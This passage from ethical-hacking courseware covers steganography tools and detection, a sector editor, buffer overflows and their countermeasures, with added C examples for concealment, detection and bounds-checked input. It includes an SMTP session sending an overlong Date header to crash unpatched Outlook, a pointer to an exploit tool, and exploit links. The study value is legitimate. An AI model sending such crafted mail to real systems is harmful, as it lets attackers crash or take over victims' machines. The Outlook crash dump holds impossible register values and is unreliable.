snow provides rudimentary compression, using Huffman tables optimised for English text. If the data is not text, or if there is a lot of it, the use of an external compression program such as compress or gzip is recommended.

If a message string or message file is specified on the command line, snow attempts to conceal the message in the file 'infile' if specified, or standard input otherwise. The resulting file is written to 'outfile' if specified, or standard output if not. If no message is provided, snow attempts to extract a message from the input file and writes the result to the output file or standard output.
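The encoding described above can be reproduced in a few dozen lines. The following C program is an added example modelled on that description, not snow's own source: it uses the same three-bits-per-group idea (a marker tab, then runs of 0 to 7 spaces each closed by a tab), but its framing (a one-byte length prefix, eight groups per line, and the constructed four-line COVER text) is this example's own, and it has no encryption or compression. It also includes the one check a reviewer would run on a suspect file: count the lines that end in whitespace.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GROUPS_PER_LINE 8   /* 3 bits per group, so roughly 3 bits per 8 columns */

/* Constructed cover text standing in for any ASCII file with a few lines. */
const char COVER[] =
    "Dear all,\n"
    "the quarterly figures are attached.\n"
    "Please review before Friday.\n"
    "Regards\n";

/* Length of the line at p (without newline); *next receives the following line. */
static size_t line_len(const char *p, const char **next)
{
    const char *nl = strchr(p, '\n');
    size_t n = nl ? (size_t)(nl - p) : strlen(p);
    *next = nl ? nl + 1 : p + n;
    return n;
}

/* Length of a line once trailing spaces and tabs are dropped. */
static size_t trimmed_len(const char *s, size_t n)
{
    while (n > 0 && (s[n - 1] == ' ' || s[n - 1] == '\t')) n--;
    return n;
}

static int bit_at(const uint8_t *b, size_t i) { return (b[i / 8] >> (7 - i % 8)) & 1; }

/* Conceal msg (up to 255 bytes) in cover; the stego text goes to out (cap bytes).
 * A line carrying data ends with a marker tab, then groups of 0..7 spaces each
 * closed by a tab; one group holds 3 bits of the stream [len][msg...].
 * Returns the length written, or -1 if the cover is too short or out too small. */
long ws_conceal(const char *cover, const uint8_t *msg, size_t len, char *out, size_t cap)
{
    if (len > 255) return -1;
    uint8_t payload[256];
    payload[0] = (uint8_t)len;
    memcpy(payload + 1, msg, len);
    size_t total_bits = (len + 1) * 8, bitpos = 0, o = 0;
    for (const char *p = cover, *next; *p; p = next) {
        size_t linelen = line_len(p, &next);
        size_t keep = trimmed_len(p, linelen);      /* existing trailing blanks would be ambiguous */
        if (o + keep + GROUPS_PER_LINE * 8 + 3 > cap) return -1;
        memcpy(out + o, p, keep);
        o += keep;
        if (bitpos < total_bits) {
            out[o++] = '\t';                          /* start-of-data marker */
            for (int g = 0; g < GROUPS_PER_LINE && bitpos < total_bits; g++) {
                int v = 0;
                for (int k = 0; k < 3; k++, bitpos++) /* zero-pad past the last payload bit */
                    v = (v << 1) | (bitpos < total_bits ? bit_at(payload, bitpos) : 0);
                memset(out + o, ' ', (size_t)v);
                o += (size_t)v;
                out[o++] = '\t';
            }
        }
        if (p[linelen] == '\n') out[o++] = '\n';
    }
    if (bitpos < total_bits) return -1;               /* ran out of lines */
    out[o] = '\0';
    return (long)o;
}

/* Recover the message from stego text into out (cap bytes). Returns its length or -1. */
long ws_extract(const char *text, uint8_t *out, size_t cap)
{
    uint8_t acc[257] = { 0 };
    size_t nbits = 0, need = 8;                       /* length byte first, then len*8 more */
    for (const char *p = text, *next; *p && nbits < need; p = next) {
        size_t linelen = line_len(p, &next);
        size_t keep = trimmed_len(p, linelen);
        if (keep == linelen || p[keep] != '\t') continue;   /* no marker: an innocent line */
        int v = 0;
        for (size_t i = keep + 1; i < linelen; i++) {
            if (p[i] == ' ') { v++; continue; }
            for (int k = 2; k >= 0 && nbits < 8 * sizeof acc; k--, nbits++)   /* tab closes a group */
                if ((v >> k) & 1) acc[nbits / 8] |= (uint8_t)(0x80 >> (nbits % 8));
            v = 0;
            if (nbits >= 8) need = 8 + (size_t)acc[0] * 8;
        }
    }
    if (nbits < need || acc[0] > cap) return -1;
    memcpy(out, acc + 1, acc[0]);
    return (long)acc[0];
}

/* Detection view: number of lines that end in any whitespace at all. */
int lines_with_trailing_ws(const char *text)
{
    int n = 0;
    for (const char *p = text, *next; *p; p = next) {
        size_t linelen = line_len(p, &next);
        if (trimmed_len(p, linelen) < linelen) n++;
    }
    return n;
}

/* Conceal msg in COVER and extract it again: 1 on an exact round trip, 0 on mismatch,
 * -1 if COVER cannot hold it. *marked (if non-NULL) gets the stego text's count of
 * lines ending in whitespace. */
int ws_roundtrip(const char *msg, int *marked)
{
    static char stego[2048];
    uint8_t out[256];
    if (ws_conceal(COVER, (const uint8_t *)msg, strlen(msg), stego, sizeof stego) < 0) return -1;
    if (marked) *marked = lines_with_trailing_ws(stego);
    long n = ws_extract(stego, out, sizeof out);
    return n == (long)strlen(msg) && memcmp(out, msg, (size_t)n) == 0;
}

int ws_demo_marked_lines(const char *msg)
{
    int marked = -1;
    return ws_roundtrip(msg, &marked) == 1 ? marked : -1;
}

int main(void)
{
    printf("round trip: %d, marked lines: %d, cover lines with trailing blanks: %d\n",
           ws_roundtrip("0300", NULL), ws_demo_marked_lines("0300"), lines_with_trailing_ws(COVER));
    return 0;
}
```

Hiding "0300" (5 payload bytes, 14 groups) marks only the first two of the four cover lines; the rest stay clean, which is exactly why a detector should flag any trailing whitespace rather than look for a fixed pattern. A cover that already contains trailing blanks is trimmed first, because otherwise the decoder could not tell the marker tab from natural whitespace.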

start sidebar
Tool: Camera/Shy
  • Camera/Shy works with Windows and Internet Explorer and lets users share censored or sensitive information buried within an ordinary gif image.

  • The program lets users encrypt text with a click of the mouse and bury the text in an image. The files can be password protected for further security.

  • Viewers who open the pages with the Camera/Shy browser tool can then decrypt the embedded text on the fly by double-clicking on the image and supplying a password.

end sidebar
 
Tools  

Hacktivismo, purportedly a sub-group of the Cult of the Dead Cow (cDc) hacker group, released the Camera/Shy steganographic program on July 13, 2002.

Camera/Shy is essentially a very simple steganography tool that allows users to encrypt information and hide it in standard GIF images. What makes this program different from most steganography tools is its ease of use - and hence a desirable component of a cracker's arsenal.

While other steganography programs are command line-based , Camera/Shy is embedded in a Web browser. Other programs require users to know beforehand that an image contains embedded content, but Camera/Shy allows users to check images for embedded messages, read them and embed their own return messages with the click of a mouse.

The Camera/Shy program allows Internet users to conceal information, viruses or other software inside graphic files on Web pages, and it bypasses most known monitoring methods. Using LSB steganographic techniques and 256-bit AES encryption, it enables users to share censored information with their friends by hiding it in plain view in ordinary GIF images. It leaves no trace on the user's system. A web site can be made C/S (Camera/Shy) enabled so that a reader decrypts images from an HTML page on the fly.

start sidebar
Steganography Detection
  • Stegdetect is an automated tool for detecting steganographic content in images.

  • It is capable of detecting different steganographic methods to embed hidden information in JPEG images.

  • Stegbreak is used to launch dictionary attacks against Jsteg-Shell, JPHide and OutGuess 0.13b.

end sidebar
 

The first step in steganalysis is to discover an image that is suspected of harbouring a message. This is considered an "attack" on the hidden information. There are two other types of attack against steganography: the known-message attack and the chosen-message attack. In the former, the steganalyst has a known hidden message and the corresponding stego-image, and determines the patterns that arise from hiding the message in order to detect them elsewhere. In the latter, the steganalyst creates a stego-image from a chosen message using a known stego tool and analyses the differences in pattern that the tool introduces.

The majority of stego-images do not reveal visual clues when compared with their cover image and thus require a more detailed analysis to determine that information has been concealed. The simplest signature is an increase in file size between the stego-image and the cover image; it appears with tools that append data to the file (Pretty Good Envelope, appendX, camouflage), but not with LSB replacement, which changes bits in place and leaves the size unchanged. Most of the other signatures manifest themselves as changes to the colour palette or to the statistics of the sample values of the cover image.

Once a stego-image has been discovered there are several steps that can be taken to disable or destroy the hidden message. Stego-images created with an Image Domain tool can be rendered useless simply by converting the image to JPEG format. Other image manipulations include: cropping (removing portions of the image); rotating the image; blurring (decreasing the contrast between pixels); sharpening (increasing the contrast between pixels, the opposite of blurring); adding or removing noise; resampling; converting between bit depths (greyscale, 8-bit, 24-bit); converting from digital to analogue to digital (printing the image and rescanning it); adding bit-wise messages of one's own; and adding transform-domain messages.
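Stegdetect's statistical detection and the 'frequency counts' that OutGuess is designed to preserve both rest on the kind of test below. It is an added example, not Stegdetect's code: the pairs-of-values chi-square test of Westfeld and Pfitzmann, applied to a constructed 64x64 greyscale sample set whose even and odd values are deliberately unequal in frequency (as they usually are in natural images) and then to the same data after every LSB has been replaced by a random payload bit. The function names, the xorshift-generated payload and the cover are all this example's assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define N_SAMPLES (64 * 64)

/* Constructed cover with the skew natural images tend to have: values come in
 * even/odd pairs (2k, 2k+1) whose two members are NOT equally frequent; here
 * odd values are rare. */
void make_skewed_cover(uint8_t *px, size_t n)
{
    for (size_t i = 0; i < n; i++)
        px[i] = (uint8_t)(2 * ((i * 7) % 120) + (i % 13 == 0 ? 1 : 0));
}

/* xorshift32: deterministic stand-in for an encrypted (random-looking) payload. */
static uint32_t xs_state = 0x2545F491u;
static int next_payload_bit(void)
{
    uint32_t x = xs_state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    xs_state = x;
    return (int)((x >> 16) & 1u);
}

/* LSB replacement of every sample: the "bit-wise" embedding described above. */
void embed_random_lsb(uint8_t *px, size_t n)
{
    for (size_t i = 0; i < n; i++)
        px[i] = (uint8_t)((px[i] & 0xFE) | next_payload_bit());
}

/* Pairs-of-values chi-square: LSB replacement only moves samples between 2k and
 * 2k+1, so after embedding a random payload the two counts converge on their mean.
 * A large statistic means the pairs are far from equal, i.e. no LSB payload yet. */
double pov_chi_square(const uint8_t *px, size_t n)
{
    unsigned long h[256] = { 0 };
    for (size_t i = 0; i < n; i++) h[px[i]]++;
    double chi = 0.0;
    for (int k = 0; k < 128; k++) {
        double expected = (h[2 * k] + h[2 * k + 1]) / 2.0;
        if (expected > 0.0) {
            double d = (double)h[2 * k] - expected;
            chi += d * d / expected;
        }
    }
    return chi;
}

/* Run the test on the cover, then on the same cover carrying a full random payload. */
void pov_demo(double *before, double *after)
{
    static uint8_t px[N_SAMPLES];
    make_skewed_cover(px, N_SAMPLES);
    *before = pov_chi_square(px, N_SAMPLES);
    xs_state = 0x2545F491u;                 /* same payload on every run */
    embed_random_lsb(px, N_SAMPLES);
    *after = pov_chi_square(px, N_SAMPLES);
}

double pov_demo_before(void) { double b, a; pov_demo(&b, &a); return b; }
double pov_demo_after(void)  { double b, a; pov_demo(&b, &a); return a; }

int main(void)
{
    printf("chi-square cover: %.1f, stego: %.1f\n", pov_demo_before(), pov_demo_after());
    return 0;
}
```

The statistic collapses after embedding (from well over a thousand to a few dozen on this data) because a random payload equalises each pair. The test is blind to covers whose pairs were already balanced, to partial embeddings (only the first part of the image is changed, so the test must be run on windows of the data), and to tools such as OutGuess that deliberately repair the histogram afterwards, which is why Stegdetect also carries scheme-specific checks.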

Stegdetect is an automated tool for detecting steganographic content in images. It is capable of detecting several different steganographic methods to embed hidden information in JPEG images. Currently, the detectable schemes are

  • jsteg,

  • jphide (unix and windows),

  • invisible secrets,

  • outguess 0.13b,

  • F5 (header analysis),

  • appendX and camouflage.

Stegbreak is used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.

start sidebar
Tool: dskprobe.exe

Windows 2000 Installation CD-ROM

  • dskprobe.exe is a low level disk editor located in Support Tools directory.

  • Steps to read the contents of the EFS temporary file:

    1. Launch dskprobe and open the physical drive to read.

    2. Click the Set Active button adjacent to the drive after it populates handle '0'.

    3. Click Tools -> Search Sectors and search for the string efs0.tmp (from sector 0 to the end of the disk).

    4. Select Exhaustive Search, Ignore Case and Unicode characters.

end sidebar
 
Tools  

DiskProbe is a sector editor for Windows 2000. It allows a user with local Administrator rights to directly edit, save, and copy data on the physical hard drive that is not accessible in any other way.

This tool can help prepare for disk-based problems by saving critical disk structures before problems arise. Documenting and preserving these disk structures, such as the Master Boot Record (MBR) and boot sector, provides a fall-back in case of disk corruption. DiskProbe can also be used to resolve problems once they are encountered: with it, the user can edit and repair these sectors byte by byte if corruption does occur.

DiskProbe and other sector editors function at a level "below" the file system, so the normal checks for maintaining disk consistency are not enforced. This tool gives the user direct access to every byte on the physical disk without regard to access privilege, which makes it possible to damage or permanently overwrite critical on-disk data structures.

DiskProbe uses no configuration files. The only change it makes to the registry is to register the shell type and default file name extension (.dsk).

dskprobe c:\mydir\sector00.dsk

This example runs DiskProbe and opens sector00.dsk in the c:\mydir folder.

After the program has been run, double-clicking a file with the .dsk extension will start DiskProbe and load the file. DiskProbe cannot read the disk management database. That means users who upgrade their disks to dynamic disk will not be able to use all of the functionality of DiskProbe on those disks.

start sidebar
Buffer overflows
  • A buffer overrun occurs when a program allocates a block of memory of a certain length and then tries to stuff too much data into it; the excess overflows into, and overwrites, adjacent memory that may be crucial to the normal execution of the program. Consider the following source code:

     #include <stdio.h>

     int main(void)
     {
         char name[32];                     /* 32-byte buffer for the name */
         printf("Please type your name: ");
         gets(name);                        /* no bounds check: long input runs past name[] */
         printf("Hello, %s\n", name);
         return 0;
     }

  • When the source is compiled and the program is run, it sets aside a block of memory 32 bytes long to hold the name string, but gets() places no limit on how much input it writes there.

  • A buffer overflow will occur if you enter more than 31 characters, for example:

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
end sidebar
 
Concept  

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity.

In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information.

Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

Once a programmer has found a buffer overflow situation, then it is necessary to create a buffer of hex characters that represent assembled code instructions. The programmer then creates a C program that executes the target program, overflows the buffer by inserting the hex code to be executed.
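To make the mechanism concrete, the following C program is an added example (not part of the courseware) built around the gets() program from the sidebar. It models the 32-byte name buffer and the saved return address that follows it as one array, so the overwrite can be shown without crashing the demonstration, pushes the sidebar's over-long input through an unchecked copy and through a bounded one, and supplies read_line_bounded(), a replacement for gets() built on fgets(). The frame layout, the sentinel return-address bytes and the function names are this example's assumptions.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define NAME_LEN 32          /* the name[] buffer from the sidebar example */
#define RET_LEN  8           /* model of the saved return address stored after it */

/* Model of the stack frame gets(name) writes into: the buffer and, directly after it,
 * the saved return address. Kept in one array so the spill is well-defined here; on a
 * real stack the adjacent bytes are exactly what gets() overwrites. */
typedef struct { uint8_t mem[NAME_LEN + RET_LEN]; } frame_t;

/* Constructed sentinel standing in for a real return address. */
static const uint8_t ORIG_RET[RET_LEN] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };

void frame_init(frame_t *f)
{
    memset(f->mem, 0, sizeof f->mem);
    memcpy(f->mem + NAME_LEN, ORIG_RET, RET_LEN);
}

int ret_intact(const frame_t *f) { return memcmp(f->mem + NAME_LEN, ORIG_RET, RET_LEN) == 0; }

/* Vulnerable: trusts the input length, as gets()/strcpy() do. (Capped at the model
 * frame only so this demo cannot corrupt its own process; gets() has no cap at all.) */
size_t copy_unchecked(frame_t *f, const char *in)
{
    size_t n = strlen(in);
    if (n > sizeof f->mem) n = sizeof f->mem;
    memcpy(f->mem, in, n);            /* anything past NAME_LEN lands in the return-address slot */
    return n;
}

/* Hardened: never writes past name[], always NUL-terminates. Returns 1 if truncated. */
int copy_checked(frame_t *f, const char *in)
{
    size_t n = strlen(in);
    int truncated = n >= NAME_LEN;
    if (truncated) n = NAME_LEN - 1;
    memcpy(f->mem, in, n);
    f->mem[n] = '\0';
    return truncated;
}

/* Feed the sidebar's over-long input through either routine; 1 if the return slot survived. */
int overflow_demo(int use_checked)
{
    frame_t f;
    char input[47];
    memset(input, 'A', 46);           /* 46 'A's: longer than the 32-byte buffer */
    input[46] = '\0';
    frame_init(&f);
    if (use_checked) copy_checked(&f, input); else copy_unchecked(&f, input);
    return ret_intact(&f);
}

/* Drop-in replacement for gets(name): bounded read, newline stripped, and the rest of
 * an over-long line drained so it is not mistaken for the next input.
 * Returns 0 on EOF/error, 1 on success, 2 if the line had to be truncated. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) return 0;
    char *nl = strchr(dst, '\n');
    if (nl) { *nl = '\0'; return 1; }
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n') truncated = 1;
    return truncated ? 2 : 1;
}

/* Exercise read_line_bounded() with the same 46-character line via a temporary file.
 * Returns status * 100 + resulting string length (231 = truncated, 31 chars kept). */
int bounded_read_demo(void)
{
    char name[NAME_LEN];
    FILE *tmp = tmpfile();
    if (!tmp) return -1;
    for (int i = 0; i < 46; i++) fputc('A', tmp);
    fputc('\n', tmp);
    rewind(tmp);
    int status = read_line_bounded(name, sizeof name, tmp);
    fclose(tmp);
    return status * 100 + (int)strlen(name);
}

int main(void)
{
    printf("unchecked copy: return address intact = %d\n", overflow_demo(0));
    printf("checked copy:   return address intact = %d\n", overflow_demo(1));
    printf("bounded read status/length: %d\n", bounded_read_demo());
    return 0;
}
```

The cap inside copy_unchecked() exists only to keep the model inside its own array; gets() has no such cap, which is why it was removed from the language in C11. Note also what read_line_bounded() does with the remainder of an over-long line: draining it prevents the leftover bytes from being read as the next input, a second bug that naive fgets() replacements often keep.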

start sidebar
Outlook Buffer Overflow
  • There is a vulnerability in Microsoft Outlook client. The attacker sends an e-mail with a malformed header that causes buffer overflow to occur.

    1. It will cause the victim's machine to crash or

    2. Cause arbitrary code to run on the victim's computer.

  • Affects the following versions:

    • Microsoft Outlook versions 97/98 and 2000.

    • Microsoft Outlook Express 4.0, 4.01. 5.0 and 5.01

end sidebar
 
Note  

In July 2000, a buffer overflow vulnerability was discovered in Microsoft Outlook and Outlook Express. A programming flaw made it possible for an attacker to compromise the target computer simply by sending it an e-mail message. Unlike the typical e-mail virus, users could not protect themselves by refusing to open attachments; the user did not even have to open the message to trigger the attack. The programs' message header handling had a defect that allowed a sender to overflow the area with extraneous data and so execute whatever code they desired on the recipient's computer.

Because the process was triggered as soon as the recipient downloaded the message from the server, this type of buffer overflow attack was very difficult to defend against. The only remedy at the time was to ask the administrator to delete the mail from the server: as long as it remained there, Outlook tried to download it again on the next start and crashed again. Microsoft has since released a patch that eliminates the vulnerability. To see the effect, use outoutlook.exe from www.ussrback.com against an older, unpatched version of Outlook, as the patch is likely to be installed on most current systems.


The system responds as shown below.

start sidebar

Attacker telnets to an SMTP mail server on port 25 and types the following

 MAIL FROM: BADUSER@BADUSER.COM
 RCPT TO: VICTIM@VICTIM.COM
 DATA
 Date: Tuesday, August 2, 2002 +111111111111111111111111111111111111111111111111111111111111111111
 .
 QUIT

The following error is generated by victim's Outlook.

 Outlook caused an invalid page fault in module at 00de:003432
 Registers:
 EAX=800045300  CS=018f  EIP=00asdf04  EFLGS=00340045
 EAX=800045000  CS=918f  EIP=00asd604  EFLGS=00340f05
 EAX=800045000  CS=018f  EIP=00asdf04  EFLGS=00340h05
 EAX=800045000  CS=018f  EIP=00asdf04  EFLGS=00340g05
 Bytes at CS:EIP
 Stack dump:
 0241f360 01234543 00000001 0000000000 00000003455 00000000340
 0000000 34500000 004000000 45000000 3232323223 23232332232 23
end sidebar
 
start sidebar
List of Buffer Overflow Cases
  • Netmeeting 2.x exploit

    (http://www.cultdeadcow.com/cDc_files/cDc-351/)

  • NT RAS Exploit

    (http://www.cerberus-infosec.co.uk/wprasbuf.html)

  • IIS Hack

    (http://www.eeye.com)

  • Oracle Web Exploit

    (http://www.cerberus-infosec.co.uk/advowl.html)

  • Outlook Exploit

    (http://www.ussrback.com/labs50.html)

  • IIS.printer

    (http://www.securityfocus.com/bid/2674)

end sidebar
 

You may find details of a few known buffer overflow exploits at the URLs mentioned below:

  • Netmeeting 2.x exploit (http://www.cultdeadcow.com/cDc_files/cDc-351/)

  • NT RAS Exploit (http://www.cerberus-infosec.co.uk/wprasbuf.html)

  • IIS Hack (http://www.eeye.com)

  • Oracle Web Exploit (http://www.cerberus-infosec.co.uk/advowl.html)

  • Outlook Exploit (http://www.ussrback.com/labs50.html)

  • IIS .printer (http://www.securityfocus.com/bid/2674)

The topic is dealt with in detail in a subsequent module devoted to buffer overflow vulnerabilities.

start sidebar
Protection against Buffer Overflows
  • Buffer overflow vulnerabilities are inherent in code due to poor or no error checking.

  • General ways of protecting against buffer overflows:

    1. Close the port of service

    2. apply vendors patch or install the latest version of the software

    3. Filter specific traffic at the firewall

    4. Test key application

    5. Run software at the least privilege required

end sidebar
 
Note  

A buffer overflow attack has two prerequisites. First, a buffer overflow must exist in the program. Second, the attacker must be able to use it to overwrite a security-sensitive piece of data (a security flag, a function pointer, a return address and so on).

Countermeasures are therefore directed at these two factors: either all buffer overflows are prevented, or sensitive data is protected from being overwritten. Since neither can be guaranteed in practice, we do both as far as possible: avoid dangerous functions such as gets and strcpy in favour of bounded ones, and prevent data supplied by the attacker from being executed (for example with a non-executable stack), which stops the attacker from jumping into his own buffer. The first principle remains good coding and error checking.

Countermeasure  

General ways of protecting against buffer overflows include:

  1. Close the port of service: Keep track of vulnerability reports from sources like CERT, bugtraq and take preventive measures such as blocking the port in question.

  2. Apply vendors patch or install the latest version of the software: The next step should be to apply hotfix or patches from a reliable source.

  3. Filter specific traffic at the firewall: Suspicious traffic should be dropped at the perimeter itself.

  4. Test key application: Key applications should be tested for boundary conditions before being put into production.

  5. Run software at the least privilege required: No unnecessary privileges should be granted to users or applications. This is a best practice.

start sidebar
Summary
  • Hackers use a variety of means to penetrate systems.

  • Password guessing / cracking is one of the first steps.

  • Password sniffing is a preferred eavesdropping tactic.

  • Vulnerability scanning helps the hacker decide which password cracking technique to use.

  • Keystroke loggers and other spyware tools are planted once entry has been gained, so that the attack can continue.

  • Evidence of "having been there and done the damage" is almost always removed by attackers.

  • Stealing files and hiding files are both means used to sneak out sensitive information.

end sidebar
 



Staff of EC-Council - Ethical Hacking Student Courseware. Certified Ethical Hacker - Exam 312-50 (EC-Council E-Business Certification Series)
Year: 2003
Pages: 109
